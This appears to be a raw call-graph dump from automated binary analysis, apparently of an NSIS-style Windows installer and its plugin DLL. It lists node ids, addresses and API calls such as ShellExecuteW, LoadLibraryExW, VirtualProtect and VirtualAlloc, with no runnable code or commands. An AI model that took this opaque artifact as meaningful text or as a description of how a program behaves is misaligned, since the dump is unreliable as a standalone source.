3984->4000 4001 405f48 lstrcpynW 3984->4001 3985->3984 3987 4061e9 3986->3987 3989 406252 CharNextW 3987->3989 3990 40625f 3987->3990 3993 40623e CharNextW 3987->3993 3994 40624d CharNextW 3987->3994 4003 4059c0 3987->4003 3988 406264 CharPrevW 3988->3990 3989->3987 3989->3990 3990->3988 3991 406285 3990->3991 3991->3965 3993->3987 3994->3989 3996 405e89 3995->3996 3997 405e49 RegQueryValueExW 3995->3997 3996->3984 3998 405e6a RegCloseKey 3997->3998 3998->3996 4000->3984 4001->3984 4002->3970 4004 4059c6 4003->4004 4005 4059dc 4004->4005 4006 4059cd CharNextW 4004->4006 4005->3987 4006->4004 5115 401ce5 GetDlgItem GetClientRect 5116 402b3a 18 API calls 5115->5116 5117 401d17 LoadImageW SendMessageW 5116->5117 5118 401d35 DeleteObject 5117->5118 5119 4029c7 5117->5119 5118->5119 5120 405166 5121 405176 5120->5121 5122 40518a 5120->5122 5124 4051d3 5121->5124 5125 40517c 5121->5125 5123 405192 IsWindowVisible 5122->5123 5131 4051a9 5122->5131 5123->5124 5126 40519f 5123->5126 5127 4051d8 CallWindowProcW 5124->5127 5128 4041e6 SendMessageW 5125->5128 5133 404abc SendMessageW 5126->5133 5130 405186 5127->5130 5128->5130 5131->5127 5138 404b3c 5131->5138 5134 404b1b SendMessageW 5133->5134 5135 404adf GetMessagePos ScreenToClient SendMessageW 5133->5135 5136 404b13 5134->5136 5135->5136 5137 404b18 5135->5137 5136->5131 5137->5134 5147 405f48 lstrcpynW 5138->5147 5140 404b4f 5148 405e8f wsprintfW 5140->5148 5142 404b59 5143 40140b 2 API calls 5142->5143 5144 404b62 5143->5144 5149 405f48 lstrcpynW 5144->5149 5146 404b69 5146->5124 5147->5140 5148->5142 5149->5146 5150 4042e8 lstrlenW 5151 404307 5150->5151 5152 404309 WideCharToMultiByte 5150->5152 5151->5152 5160 100018a9 5161 100018cc 5160->5161 5162 100018ff GlobalFree 5161->5162 5163 10001911 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5161->5163 5162->5163 5164 10001272 2 API calls 5163->5164 5165 10001a87 GlobalFree GlobalFree 5164->5165 4267 40206a 4268 402b3a 18 API calls 4267->4268 4269 402071 
4268->4269 4270 402b3a 18 API calls 4269->4270 4271 40207b 4270->4271 4272 402b3a 18 API calls 4271->4272 4273 402084 4272->4273 4274 402b3a 18 API calls 4273->4274 4275 40208e 4274->4275 4276 402b3a 18 API calls 4275->4276 4277 402098 4276->4277 4278 4020ac CoCreateInstance 4277->4278 4279 402b3a 18 API calls 4277->4279 4282 4020cb 4278->4282 4279->4278 4281 402197 4282->4281 4283 401423 4282->4283 4284 4051f2 25 API calls 4283->4284 4285 401431 4284->4285 4285->4281 5166 40156b 5167 401584 5166->5167 5168 40157b ShowWindow 5166->5168 5169 401592 ShowWindow 5167->5169 5170 4029c7 5167->5170 5168->5167 5169->5170 5171 404b6e GetDlgItem GetDlgItem 5172 404bc0 7 API calls 5171->5172 5181 404dd9 5171->5181 5173 404c63 DeleteObject 5172->5173 5174 404c56 SendMessageW 5172->5174 5175 404c6c 5173->5175 5174->5173 5176 404ca3 5175->5176 5180 405f6a 18 API calls 5175->5180 5178 40419a 19 API calls 5176->5178 5177 404ebd 5179 404f69 5177->5179 5190 404f16 SendMessageW 5177->5190 5211 404dcc 5177->5211 5182 404cb7 5178->5182 5184 404f73 SendMessageW 5179->5184 5185 404f7b 5179->5185 5186 404c85 SendMessageW SendMessageW 5180->5186 5181->5177 5183 404e4a 5181->5183 5188 404abc 5 API calls 5181->5188 5189 40419a 19 API calls 5182->5189 5183->5177 5192 404eaf SendMessageW 5183->5192 5184->5185 5187 404fa4 5185->5187 5193 404f94 5185->5193 5194 404f8d ImageList_Destroy 5185->5194 5186->5175 5196 405113 5187->5196 5214 404b3c 4 API calls 5187->5214 5218 404fdf 5187->5218 5188->5183 5195 404cc5 5189->5195 5197 404f2b SendMessageW 5190->5197 5190->5211 5191 404201 8 API calls 5198 40515f 5191->5198 5192->5177 5193->5187 5199 404f9d GlobalFree 5193->5199 5194->5193 5200 404d9a GetWindowLongW SetWindowLongW 5195->5200 5208 404d15 SendMessageW 5195->5208 5210 404d94 5195->5210 5212 404d51 SendMessageW 5195->5212 5213 404d62 SendMessageW 5195->5213 5201 405125 ShowWindow GetDlgItem ShowWindow 5196->5201 5196->5211 5205 404f3e 5197->5205 5199->5187 5202 404db3 5200->5202 5201->5211 5203 
404dd1 5202->5203 5204 404db9 ShowWindow 5202->5204 5223 4041cf SendMessageW 5203->5223 5222 4041cf SendMessageW 5204->5222 5209 404f4f SendMessageW 5205->5209 5208->5195 5209->5179 5210->5200 5210->5202 5211->5191 5212->5195 5213->5195 5214->5218 5215 4050e9 InvalidateRect 5215->5196 5216 4050ff 5215->5216 5224 4049d6 5216->5224 5217 40500d SendMessageW 5221 405023 5217->5221 5218->5217 5218->5221 5220 405097 SendMessageW SendMessageW 5220->5221 5221->5215 5221->5220 5222->5211 5223->5181 5225 4049f3 5224->5225 5226 405f6a 18 API calls 5225->5226 5227 404a28 5226->5227 5228 405f6a 18 API calls 5227->5228 5229 404a33 5228->5229 5230 405f6a 18 API calls 5229->5230 5231 404a64 lstrlenW wsprintfW SetDlgItemTextW 5230->5231 5231->5196 5232 4024ee 5233 4024f3 5232->5233 5234 40250c 5232->5234 5235 402b1d 18 API calls 5233->5235 5236 402512 5234->5236 5237 40253e 5234->5237 5242 4024fa 5235->5242 5238 402b3a 18 API calls 5236->5238 5239 402b3a 18 API calls 5237->5239 5240 402519 WideCharToMultiByte lstrlenA 5238->5240 5241 402545 lstrlenW 5239->5241 5240->5242 5241->5242 5243 402793 5242->5243 5244 402567 WriteFile 5242->5244 5244->5243 5245 4045ee 5246 404624 5245->5246 5247 4045fe 5245->5247 5249 404201 8 API calls 5246->5249 5248 40419a 19 API calls 5247->5248 5250 40460b SetDlgItemTextW 5248->5250 5251 404630 5249->5251 5250->5246 5252 4018ef 5253 401926 5252->5253 5254 402b3a 18 API calls 5253->5254 5255 40192b 5254->5255 5256 4057d0 71 API calls 5255->5256 5257 401934 5256->5257 5258 404970 5259 404980 5258->5259 5260 40499c 5258->5260 5269 405708 GetDlgItemTextW 5259->5269 5262 4049a2 SHGetPathFromIDListW 5260->5262 5263 4049cf 5260->5263 5265 4049b9 SendMessageW 5262->5265 5266 4049b2 5262->5266 5264 40498d SendMessageW 5264->5260 5265->5263 5267 40140b 2 API calls 5266->5267 5267->5265 5269->5264 5270 402770 5271 402b3a 18 API calls 5270->5271 5272 402777 FindFirstFileW 5271->5272 5273 40279f 5272->5273 5277 40278a 5272->5277 5274 4027a8 5273->5274 5278 405e8f 
wsprintfW 5273->5278 5279 405f48 lstrcpynW 5274->5279 5278->5274 5279->5277 5280 4014f1 SetForegroundWindow 5281 4029c7 5280->5281 5282 4018f2 5283 402b3a 18 API calls 5282->5283 5284 4018f9 5283->5284 5285 405724 MessageBoxIndirectW 5284->5285 5286 401902 5285->5286 4462 402573 4463 402b1d 18 API calls 4462->4463 4469 402582 4463->4469 4464 4026a0 4465 4025c8 ReadFile 4465->4464 4465->4469 4466 405c37 ReadFile 4466->4469 4467 4026a2 4474 405e8f wsprintfW 4467->4474 4468 402608 MultiByteToWideChar 4468->4469 4469->4464 4469->4465 4469->4466 4469->4467 4469->4468 4471 4026b3 4469->4471 4472 40262e SetFilePointer MultiByteToWideChar 4469->4472 4471->4464 4473 4026d4 SetFilePointer 4471->4473 4472->4469 4473->4464 4474->4464 5287 401df3 5288 402b3a 18 API calls 5287->5288 5289 401df9 5288->5289 5290 402b3a 18 API calls 5289->5290 5291 401e02 5290->5291 5292 402b3a 18 API calls 5291->5292 5293 401e0b 5292->5293 5294 402b3a 18 API calls 5293->5294 5295 401e14 5294->5295 5296 401423 25 API calls 5295->5296 5297 401e1b ShellExecuteW 5296->5297 5298 401e4c 5297->5298 5304 100016b6 5305 100016e5 5304->5305 5306 10001b18 22 API calls 5305->5306 5307 100016ec 5306->5307 5308 100016f3 5307->5308 5309 100016ff 5307->5309 5310 10001272 2 API calls 5308->5310 5311 10001726 5309->5311 5312 10001709 5309->5312 5315 100016fd 5310->5315 5313 10001750 5311->5313 5314 1000172c 5311->5314 5316 1000153d 3 API calls 5312->5316 5318 1000153d 3 API calls 5313->5318 5317 100015b4 3 API calls 5314->5317 5319 1000170e 5316->5319 5321 10001731 5317->5321 5318->5315 5320 100015b4 3 API calls 5319->5320 5322 10001714 5320->5322 5323 10001272 2 API calls 5321->5323 5324 10001272 2 API calls 5322->5324 5325 10001737 GlobalFree 5323->5325 5326 1000171a GlobalFree 5324->5326 5325->5315 5327 1000174b GlobalFree 5325->5327 5326->5315 5327->5315 5328 10002238 5329 10002296 5328->5329 5331 100022cc 5328->5331 5330 100022a8 GlobalAlloc 5329->5330 5329->5331 5330->5329 4693 4026f9 4694 402700 4693->4694 
4697 402972 4693->4697 4695 402b1d 18 API calls 4694->4695 4696 40270b 4695->4696 4698 402712 SetFilePointer 4696->4698 4698->4697 4699 402722 4698->4699 4701 405e8f wsprintfW 4699->4701 4701->4697 5332 1000103d 5333 1000101b 5 API calls 5332->5333 5334 10001056 5333->5334 5335 402c7f 5336 402c91 SetTimer 5335->5336 5337 402caa 5335->5337 5336->5337 5338 402cf8 5337->5338 5339 402cfe MulDiv 5337->5339 5340 402cb8 wsprintfW SetWindowTextW SetDlgItemTextW 5339->5340 5340->5338 5342 4014ff 5343 401507 5342->5343 5345 40151a 5342->5345 5344 402b1d 18 API calls 5343->5344 5344->5345 5346 401000 5347 401037 BeginPaint GetClientRect 5346->5347 5348 40100c DefWindowProcW 5346->5348 5349 4010f3 5347->5349 5351 401179 5348->5351 5352 401073 CreateBrushIndirect FillRect DeleteObject 5349->5352 5353 4010fc 5349->5353 5352->5349 5354 401102 CreateFontIndirectW 5353->5354 5355 401167 EndPaint 5353->5355 5354->5355 5356 401112 6 API calls 5354->5356 5355->5351 5356->5355 5357 401a00 5358 402b3a 18 API calls 5357->5358 5359 401a09 ExpandEnvironmentStringsW 5358->5359 5360 401a1d 5359->5360 5362 401a30 5359->5362 5361 401a22 lstrcmpW 5360->5361 5360->5362 5361->5362 5363 401b01 5364 402b3a 18 API calls 5363->5364 5365 401b08 5364->5365 5366 402b1d 18 API calls 5365->5366 5367 401b11 wsprintfW 5366->5367 5368 4029c7 5367->5368 4264 100027c7 4265 10002817 4264->4265 4266 100027d7 VirtualProtect 4264->4266 4266->4265 5376 401f08 5377 402b3a 18 API calls 5376->5377 5378 401f0f GetFileVersionInfoSizeW 5377->5378 5379 401f36 GlobalAlloc 5378->5379 5380 401f8c 5378->5380 5379->5380 5381 401f4a GetFileVersionInfoW 5379->5381 5381->5380 5382 401f59 VerQueryValueW 5381->5382 5382->5380 5383 401f72 5382->5383 5387 405e8f wsprintfW 5383->5387 5385 401f7e 5388 405e8f wsprintfW 5385->5388 5387->5385 5388->5380 5389 401c8e 5390 402b1d 18 API calls 5389->5390 5391 401c94 IsWindow 5390->5391 5392 4019f0 5391->5392 5393 1000164f 5394 10001516 GlobalFree 5393->5394 5397 10001667 5394->5397 5395 
100016ad GlobalFree 5396 10001682 5396->5395 5397->5395 5397->5396 5398 10001699 VirtualFree 5397->5398 5398->5395 5406 401491 5407 4051f2 25 API calls 5406->5407 5408 401498 5407->5408 4498 402295 4499 402b3a 18 API calls 4498->4499 4500 4022a4 4499->4500 4501 402b3a 18 API calls 4500->4501 4502 4022ad 4501->4502 4503 402b3a 18 API calls 4502->4503 4504 4022b7 GetPrivateProfileStringW 4503->4504 4510 401f98 4511 401faa 4510->4511 4521 40205c 4510->4521 4512 402b3a 18 API calls 4511->4512 4513 401fb1 4512->4513 4515 402b3a 18 API calls 4513->4515 4514 401423 25 API calls 4516 402197 4514->4516 4517 401fba 4515->4517 4518 401fd0 LoadLibraryExW 4517->4518 4519 401fc2 GetModuleHandleW 4517->4519 4520 401fe1 4518->4520 4518->4521 4519->4518 4519->4520 4533 40631e WideCharToMultiByte 4520->4533 4521->4514 4524 401ff2 4527 402011 4524->4527 4528 401ffa 4524->4528 4525 40202b 4526 4051f2 25 API calls 4525->4526 4529 402002 4526->4529 4536 10001759 4527->4536 4530 401423 25 API calls 4528->4530 4529->4516 4531 40204e FreeLibrary 4529->4531 4530->4529 4531->4516 4534 406348 GetProcAddress 4533->4534 4535 401fec 4533->4535 4534->4535 4535->4524 4535->4525 4537 10001789 4536->4537 4578 10001b18 4537->4578 4539 10001790 4540 100018a6 4539->4540 4541 100017a1 4539->4541 4542 100017a8 4539->4542 4540->4529 4627 10002286 4541->4627 4610 100022d0 4542->4610 4547 100017cd 4548 1000180c 4547->4548 4549 100017ee 4547->4549 4553 10001812 4548->4553 4554 1000184e 4548->4554 4640 100024a9 4549->4640 4551 100017be 4552 100017c4 4551->4552 4558 100017cf 4551->4558 4552->4547 4621 100028a4 4552->4621 4560 100015b4 3 API calls 4553->4560 4556 100024a9 10 API calls 4554->4556 4555 100017d7 4555->4547 4637 10002b5f 4555->4637 4562 10001840 4556->4562 4557 100017f4 4651 100015b4 4557->4651 4631 10002645 4558->4631 4565 10001828 4560->4565 4569 10001895 4562->4569 4662 1000246c 4562->4662 4568 100024a9 10 API calls 4565->4568 4567 100017d5 4567->4547 4568->4562 4569->4540 4573 1000189f 
GlobalFree 4569->4573 4573->4540 4575 10001881 4575->4569 4666 1000153d wsprintfW 4575->4666 4576 1000187a FreeLibrary 4576->4575 4669 1000121b GlobalAlloc 4578->4669 4580 10001b3c 4670 1000121b GlobalAlloc 4580->4670 4582 10001d7a GlobalFree GlobalFree GlobalFree 4583 10001d97 4582->4583 4594 10001de1 4582->4594 4585 100020ee 4583->4585 4583->4594 4595 10001dac 4583->4595 4584 10001b47 4584->4582 4586 10001c1d GlobalAlloc 4584->4586 4588 10001c86 GlobalFree 4584->4588 4591 10001c68 lstrcpyW 4584->4591 4592 10001c72 lstrcpyW 4584->4592 4584->4594 4599 10002048 4584->4599 4603 10001f37 GlobalFree 4584->4603 4606 1000122c 2 API calls 4584->4606 4608 10001cc4 4584->4608 4676 1000121b GlobalAlloc 4584->4676 4587 10002110 GetModuleHandleW 4585->4587 4585->4594 4586->4584 4589 10002121 LoadLibraryW 4587->4589 4590 10002136 4587->4590 4588->4584 4589->4590 4589->4594 4677 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4590->4677 4591->4592 4592->4584 4594->4539 4595->4594 4673 1000122c 4595->4673 4596 10002188 4596->4594 4598 10002195 lstrlenW 4596->4598 4678 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4598->4678 4599->4594 4602 10002090 lstrcpyW 4599->4602 4602->4594 4603->4584 4604 10002148 4604->4596 4609 10002172 GetProcAddress 4604->4609 4605 100021af 4605->4594 4606->4584 4608->4584 4671 1000158f GlobalSize GlobalAlloc 4608->4671 4609->4596 4612 100022e8 4610->4612 4611 1000122c GlobalAlloc lstrcpynW 4611->4612 4612->4611 4614 10002415 GlobalFree 4612->4614 4616 100023d3 lstrlenW 4612->4616 4617 100023ba GlobalAlloc 4612->4617 4618 1000238f GlobalAlloc WideCharToMultiByte 4612->4618 4680 100012ba 4612->4680 4614->4612 4615 100017ae 4614->4615 4615->4547 4615->4551 4615->4555 4616->4614 4619 100023d1 4616->4619 4617->4619 4618->4614 4619->4614 4684 100025d9 4619->4684 4623 100028b6 4621->4623 4622 1000295b EnumWindows 4624 10002979 4622->4624 4623->4622 4625 10002a75 4624->4625 4626 
10002a6a GetLastError 4624->4626 4625->4547 4626->4625 4628 10002296 4627->4628 4630 100017a7 4627->4630 4629 100022a8 GlobalAlloc 4628->4629 4628->4630 4629->4628 4630->4542 4635 10002661 4631->4635 4632 100026b2 GlobalAlloc 4636 100026d4 4632->4636 4633 100026c5 4634 100026ca GlobalSize 4633->4634 4633->4636 4634->4636 4635->4632 4635->4633 4636->4567 4639 10002b6a 4637->4639 4638 10002baa GlobalFree 4639->4638 4687 1000121b GlobalAlloc 4640->4687 4642 10002530 StringFromGUID2 4645 100024b3 4642->4645 4643 10002541 lstrcpynW 4643->4645 4644 1000250b MultiByteToWideChar 4644->4645 4645->4642 4645->4643 4645->4644 4646 10002554 wsprintfW 4645->4646 4647 10002571 GlobalFree 4645->4647 4648 100025ac GlobalFree 4645->4648 4649 10001272 2 API calls 4645->4649 4688 100012e1 4645->4688 4646->4645 4647->4645 4648->4557 4649->4645 4692 1000121b GlobalAlloc 4651->4692 4653 100015ba 4654 100015c7 lstrcpyW 4653->4654 4656 100015e1 4653->4656 4657 100015fb 4654->4657 4656->4657 4658 100015e6 wsprintfW 4656->4658 4659 10001272 4657->4659 4658->4657 4660 100012b5 GlobalFree 4659->4660 4661 1000127b GlobalAlloc lstrcpynW 4659->4661 4660->4562 4661->4660 4663 10001861 4662->4663 4664 1000247a 4662->4664 4663->4575 4663->4576 4664->4663 4665 10002496 GlobalFree 4664->4665 4665->4664 4667 10001272 2 API calls 4666->4667 4668 1000155e 4667->4668 4668->4569 4669->4580 4670->4584 4672 100015ad 4671->4672 4672->4608 4679 1000121b GlobalAlloc 4673->4679 4675 1000123b lstrcpynW 4675->4594 4676->4584 4677->4604 4678->4605 4679->4675 4681 100012c1 4680->4681 4682 1000122c 2 API calls 4681->4682 4683 100012df 4682->4683 4683->4612 4685 100025e7 VirtualAlloc 4684->4685 4686 1000263d 4684->4686 4685->4686 4686->4619 4687->4645 4689 100012ea 4688->4689 4690 1000130c 4688->4690 4689->4690 4691 100012f0 lstrcpyW 4689->4691 4690->4645 4691->4690 4692->4653 5409 10001058 5411 10001074 5409->5411 5410 100010dd 5411->5410 5412 10001092 5411->5412 5413 10001516 GlobalFree 5411->5413 5414 10001516 
GlobalFree 5412->5414 5413->5412 5415 100010a2 5414->5415 5416 100010b2 5415->5416 5417 100010a9 GlobalSize 5415->5417 5418 100010b6 GlobalAlloc 5416->5418 5419 100010c7 5416->5419 5417->5416 5420 1000153d 3 API calls 5418->5420 5421 100010d2 GlobalFree 5419->5421 5420->5419 5421->5410 5422 401718 5423 402b3a 18 API calls 5422->5423 5424 40171f SearchPathW 5423->5424 5425 40173a 5424->5425 4932 40159b 4933 402b3a 18 API calls 4932->4933 4934 4015a2 SetFileAttributesW 4933->4934 4935 4015b4 4934->4935 5426 40659d 5430 406421 5426->5430 5427 406d8c 5428 4064a2 GlobalFree 5429 4064ab GlobalAlloc 5428->5429 5429->5427 5429->5430 5430->5427 5430->5428 5430->5429 5430->5430 5431 406522 GlobalAlloc 5430->5431 5432 406519 GlobalFree 5430->5432 5431->5427 5431->5430 5432->5431 5433 40149e 5434 4014ac PostQuitMessage 5433->5434 5435 40223e 5433->5435 5434->5435 5436 4021a0 5437 402b3a 18 API calls 5436->5437 5438 4021a6 5437->5438 5439 402b3a 18 API calls 5438->5439 5440 4021af 5439->5440 5441 402b3a 18 API calls 5440->5441 5442 4021b8 5441->5442 5443 40628b 2 API calls 5442->5443 5444 4021c1 5443->5444 5445 4021d2 lstrlenW lstrlenW 5444->5445 5446 4021c5 5444->5446 5448 4051f2 25 API calls 5445->5448 5447 4051f2 25 API calls 5446->5447 5450 4021cd 5446->5450 5447->5450 5449 402210 SHFileOperationW 5448->5449 5449->5446 5449->5450 5451 100010e1 5460 10001111 5451->5460 5452 100011d8 GlobalFree 5453 100012ba 2 API calls 5453->5460 5454 100011d3 5454->5452 5455 10001164 GlobalAlloc 5455->5460 5456 100011f8 GlobalFree 5456->5460 5457 10001272 2 API calls 5458 100011c4 GlobalFree 5457->5458 5458->5460 5459 100012e1 lstrcpyW 5459->5460 5460->5452 5460->5453 5460->5454 5460->5455 5460->5456 5460->5457 5460->5458 5460->5459 5461 401b22 5462 401b73 5461->5462 5463 401b2f 5461->5463 5464 401b9d GlobalAlloc 5462->5464 5467 401b78 5462->5467 5468 401bb8 5463->5468 5469 401b46 5463->5469 5465 405f6a 18 API calls 5464->5465 5465->5468 5466 405f6a 18 API calls 5470 402238 5466->5470 5474 
40223e 5467->5474 5482 405f48 lstrcpynW 5467->5482 5468->5466 5468->5474 5480 405f48 lstrcpynW 5469->5480 5476 405724 MessageBoxIndirectW 5470->5476 5473 401b8a GlobalFree 5473->5474 5475 401b55 5481 405f48 lstrcpynW 5475->5481 5476->5474 5478 401b64 5483 405f48 lstrcpynW 5478->5483 5480->5475 5481->5478 5482->5473 5483->5474 5484 4029a2 SendMessageW 5485 4029c7 5484->5485 5486 4029bc InvalidateRect 5484->5486 5486->5485 4110 401924 4111 401926 4110->4111 4112 402b3a 18 API calls 4111->4112 4113 40192b 4112->4113 4116 4057d0 4113->4116 4155 405a9b 4116->4155 4119 4057f8 DeleteFileW 4121 401934 4119->4121 4120 40580f 4122 40592f 4120->4122 4169 405f48 lstrcpynW 4120->4169 4122->4121 4199 40628b FindFirstFileW 4122->4199 4124 405835 4125 405848 4124->4125 4126 40583b lstrcatW 4124->4126 4170 4059df lstrlenW 4125->4170 4127 40584e 4126->4127 4130 40585e lstrcatW 4127->4130 4132 405869 lstrlenW FindFirstFileW 4127->4132 4130->4132 4132->4122 4140 40588b 4132->4140 4133 405958 4202 405993 lstrlenW CharPrevW 4133->4202 4136 405912 FindNextFileW 4136->4140 4141 405928 FindClose 4136->4141 4137 405788 5 API calls 4139 40596a 4137->4139 4142 405984 4139->4142 4143 40596e 4139->4143 4140->4136 4153 4058d3 4140->4153 4174 405f48 lstrcpynW 4140->4174 4141->4122 4145 4051f2 25 API calls 4142->4145 4143->4121 4146 4051f2 25 API calls 4143->4146 4145->4121 4148 40597b 4146->4148 4147 4057d0 64 API calls 4147->4153 4150 405de2 40 API calls 4148->4150 4149 4051f2 25 API calls 4149->4136 4151 405982 4150->4151 4151->4121 4153->4136 4153->4147 4153->4149 4175 405788 4153->4175 4183 4051f2 4153->4183 4194 405de2 4153->4194 4205 405f48 lstrcpynW 4155->4205 4157 405aac 4206 405a3e CharNextW CharNextW 4157->4206 4160 4057f0 4160->4119 4160->4120 4161 4061dc 5 API calls 4167 405ac2 4161->4167 4162 405af3 lstrlenW 4163 405afe 4162->4163 4162->4167 4164 405993 3 API calls 4163->4164 4166 405b03 GetFileAttributesW 4164->4166 4165 40628b 2 API calls 4165->4167 4166->4160 4167->4160 4167->4162 
4167->4165 4168 4059df 2 API calls 4167->4168 4168->4162 4169->4124 4171 4059ed 4170->4171 4172 4059f3 CharPrevW 4171->4172 4173 4059ff 4171->4173 4172->4171 4172->4173 4173->4127 4174->4140 4212 405b8f GetFileAttributesW 4175->4212 4178 4057b5 4178->4153 4179 4057a3 RemoveDirectoryW 4181 4057b1 4179->4181 4180 4057ab DeleteFileW 4180->4181 4181->4178 4182 4057c1 SetFileAttributesW 4181->4182 4182->4178 4184 40520d 4183->4184 4185 4052af 4183->4185 4186 405229 lstrlenW 4184->4186 4187 405f6a 18 API calls 4184->4187 4185->4153 4188 405252 4186->4188 4189 405237 lstrlenW 4186->4189 4187->4186 4190 405265 4188->4190 4191 405258 SetWindowTextW 4188->4191 4189->4185 4192 405249 lstrcatW 4189->4192 4190->4185 4193 40526b SendMessageW SendMessageW SendMessageW 4190->4193 4191->4190 4192->4188 4193->4185 4215 4062b2 GetModuleHandleA 4194->4215 4198 405e0a 4198->4153 4200 4062a1 FindClose 4199->4200 4201 405954 4199->4201 4200->4201 4201->4121 4201->4133 4203 40595e 4202->4203 4204 4059af lstrcatW 4202->4204 4203->4137 4204->4203 4205->4157 4207 405a5b 4206->4207 4210 405a6d 4206->4210 4209 405a68 CharNextW 4207->4209 4207->4210 4208 405a91 4208->4160 4208->4161 4209->4208 4210->4208 4211 4059c0 CharNextW 4210->4211 4211->4210 4213 405ba1 SetFileAttributesW 4212->4213 4214 405794 4212->4214 4213->4214 4214->4178 4214->4179 4214->4180 4216 4062d9 GetProcAddress 4215->4216 4217 4062ce LoadLibraryA 4215->4217 4218 405de9 4216->4218 4217->4216 4217->4218 4218->4198 4219 405c66 lstrcpyW 4218->4219 4220 405cb5 GetShortPathNameW 4219->4220 4221 405c8f 4219->4221 4223 405cca 4220->4223 4224 405ddc 4220->4224 4244 405bb4 GetFileAttributesW CreateFileW 4221->4244 4223->4224 4226 405cd2 wsprintfA 4223->4226 4224->4198 4225 405c99 CloseHandle GetShortPathNameW 4225->4224 4227 405cad 4225->4227 4228 405f6a 18 API calls 4226->4228 4227->4220 4227->4224 4229 405cfa 4228->4229 4245 405bb4 GetFileAttributesW CreateFileW 4229->4245 4231 405d07 4231->4224 4232 405d16 GetFileSize GlobalAlloc 
4231->4232 4233 405dd5 CloseHandle 4232->4233 4234 405d38 4232->4234 4233->4224 4246 405c37 ReadFile 4234->4246 4239 405d57 lstrcpyA 4242 405d79 4239->4242 4240 405d6b 4241 405b19 4 API calls 4240->4241 4241->4242 4243 405db0 SetFilePointer WriteFile GlobalFree 4242->4243 4243->4233 4244->4225 4245->4231 4247 405c55 4246->4247 4247->4233 4248 405b19 lstrlenA 4247->4248 4249 405b5a lstrlenA 4248->4249 4250 405b62 4249->4250 4251 405b33 lstrcmpiA 4249->4251 4250->4239 4250->4240 4251->4250 4252 405b51 CharNextA 4251->4252 4252->4249 5487 402224 5488 40223e 5487->5488 5489 40222b 5487->5489 5490 405f6a 18 API calls 5489->5490 5491 402238 5490->5491 5492 405724 MessageBoxIndirectW 5491->5492 5492->5488 5500 402729 5501 402730 5500->5501 5502 4029c7 5500->5502 5503 402736 FindClose 5501->5503 5503->5502 5504 401cab 5505 402b1d 18 API calls 5504->5505 5506 401cb2 5505->5506 5507 402b1d 18 API calls 5506->5507 5508 401cba GetDlgItem 5507->5508 5509 4024e8 5508->5509 5510 4042ae lstrcpynW lstrlenW 5511 4016af 5512 402b3a 18 API calls 5511->5512 5513 4016b5 GetFullPathNameW 5512->5513 5514 4016f1 5513->5514 5515 4016cf 5513->5515 5516 401706 GetShortPathNameW 5514->5516 5517 4029c7 5514->5517 5515->5514 5518 40628b 2 API calls 5515->5518 5516->5517 5519 4016e1 5518->5519 5519->5514 5521 405f48 lstrcpynW 5519->5521 5521->5514 4289 405331 4290 405352 GetDlgItem GetDlgItem GetDlgItem 4289->4290 4291 4054dd 4289->4291 4335 4041cf SendMessageW 4290->4335 4293 4054e6 GetDlgItem CreateThread CloseHandle 4291->4293 4294 40550e 4291->4294 4293->4294 4338 4052c5 OleInitialize 4293->4338 4296 405539 4294->4296 4297 405525 ShowWindow ShowWindow 4294->4297 4298 40555e 4294->4298 4295 4053c3 4302 4053ca GetClientRect GetSystemMetrics SendMessageW SendMessageW 4295->4302 4299 405545 4296->4299 4300 405599 4296->4300 4337 4041cf SendMessageW 4297->4337 4301 404201 8 API calls 4298->4301 4304 405573 ShowWindow 4299->4304 4305 40554d 4299->4305 4300->4298 4311 4055a7 SendMessageW 4300->4311 
4306 40556c 4301->4306 4309 405439 4302->4309 4310 40541d SendMessageW SendMessageW 4302->4310 4307 405593 4304->4307 4308 405585 4304->4308 4312 404173 SendMessageW 4305->4312 4314 404173 SendMessageW 4307->4314 4313 4051f2 25 API calls 4308->4313 4315 40544c 4309->4315 4316 40543e SendMessageW 4309->4316 4310->4309 4311->4306 4317 4055c0 CreatePopupMenu 4311->4317 4312->4298 4313->4307 4314->4300 4319 40419a 19 API calls 4315->4319 4316->4315 4318 405f6a 18 API calls 4317->4318 4320 4055d0 AppendMenuW 4318->4320 4321 40545c 4319->4321 4322 405600 TrackPopupMenu 4320->4322 4323 4055ed GetWindowRect 4320->4323 4324 405465 ShowWindow 4321->4324 4325 405499 GetDlgItem SendMessageW 4321->4325 4322->4306 4326 40561b 4322->4326 4323->4322 4327 405488 4324->4327 4328 40547b ShowWindow 4324->4328 4325->4306 4329 4054c0 SendMessageW SendMessageW 4325->4329 4330 405637 SendMessageW 4326->4330 4336 4041cf SendMessageW 4327->4336 4328->4327 4329->4306 4330->4330 4331 405654 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4330->4331 4333 405679 SendMessageW 4331->4333 4333->4333 4334 4056a2 GlobalUnlock SetClipboardData CloseClipboard 4333->4334 4334->4306 4335->4295 4336->4325 4337->4296 4339 4041e6 SendMessageW 4338->4339 4340 4052e8 4339->4340 4343 40530f 4340->4343 4344 401389 2 API calls 4340->4344 4341 4041e6 SendMessageW 4342 405321 OleUninitialize 4341->4342 4343->4341 4344->4340 5522 402331 5523 402337 5522->5523 5524 402b3a 18 API calls 5523->5524 5525 402349 5524->5525 5526 402b3a 18 API calls 5525->5526 5527 402353 RegCreateKeyExW 5526->5527 5528 40237d 5527->5528 5530 402793 5527->5530 5529 402398 5528->5529 5531 402b3a 18 API calls 5528->5531 5533 402b1d 18 API calls 5529->5533 5534 4023a4 5529->5534 5532 40238e lstrlenW 5531->5532 5532->5529 5533->5534 5535 4023bf RegSetValueExW 5534->5535 5536 403062 46 API calls 5534->5536 5537 4023d5 RegCloseKey 5535->5537 5536->5535 5537->5530 5539 404635 5540 404661 5539->5540 5541 404672 5539->5541 5600 405708 
